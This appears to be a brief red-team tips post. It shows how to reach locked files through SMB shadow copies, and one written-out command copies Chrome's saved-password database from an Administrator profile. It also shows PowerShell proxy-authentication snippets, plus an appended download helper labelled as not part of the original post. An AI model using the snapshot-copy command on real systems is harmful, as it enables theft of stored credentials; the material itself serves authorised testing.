General Redteam & Pentest Tips
This post collects, in no particular order ("en vrac"), all the tips that I found useful.
Tip 1: Access locked files through SMB
Want to access locked files through SMB? Check whether a shadow copy is available on the targeted system, using the list_snapshot command of smbclient.py:
smbclient.py user@target list_snapshot
Then simply list the contents of a snapshot:
ls <@GMT-XXXX>\
For example, you can retrieve the Login Data file, which normally cannot be copied while Chrome is running:
copy @GMT-2021.10.04-13.05.04\Users\Administrator\AppData\Local\Google\Chrome\Default\Login Data .
Tip 2: PowerShell with a proxy
To use PowerShell through a corporate proxy:
$Wcl = new-object System.Net.WebClient
$Wcl.Headers.Add("user-agent", "PowerShell Script")
$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
If the default credentials do not work:
$Wcl=New-Object System.Net.WebClient
$Creds=Get-Credential
$Wcl.Proxy.Credentials=$Creds
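The two snippets of Tip 2 combined into one function, as an added example that is not part of the original post: it tries the default network credentials first and prompts for explicit ones only when the proxy answers HTTP 407. The function name Invoke-ProxyDownload and the URL in the usage comment are assumptions made for illustration.

```powershell
# Added example: Invoke-ProxyDownload is a hypothetical helper name.
function Invoke-ProxyDownload {
    param([Parameter(Mandatory = $true)] [string] $Url)

    $Wcl = New-Object System.Net.WebClient
    try {
        # Use the system proxy settings if the client has no proxy attached.
        if (-not $Wcl.Proxy) {
            $Wcl.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
        }
        # Attempt 1: credentials of the logged-on user.
        $Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

        foreach ($Attempt in 1..2) {
            # Re-apply the header on each attempt in case the client reset it.
            $Wcl.Headers["user-agent"] = "PowerShell Script"
            try {
                return $Wcl.DownloadString($Url)
            }
            catch {
                # PowerShell wraps .NET exceptions; walk down to the WebException.
                $Ex = $_.Exception
                while ($Ex -and $Ex -isnot [System.Net.WebException]) {
                    $Ex = $Ex.InnerException
                }
                $Resp = if ($Ex) { $Ex.Response -as [System.Net.HttpWebResponse] }
                $Is407 = $Resp -and
                    $Resp.StatusCode -eq [System.Net.HttpStatusCode]::ProxyAuthenticationRequired
                # Rethrow anything that is not a proxy authentication failure,
                # and give up after the explicit credentials were also refused.
                if ($Attempt -eq 2 -or -not $Is407) { throw }
            }
            # Attempt 2: ask for explicit proxy credentials.
            $Creds = Get-Credential -Message "Proxy credentials"
            $Wcl.Proxy.Credentials = $Creds.GetNetworkCredential()
        }
    }
    finally {
        $Wcl.Dispose()
    }
}

# Usage (placeholder URL):
# Invoke-ProxyDownload -Url "https://example.com/"
```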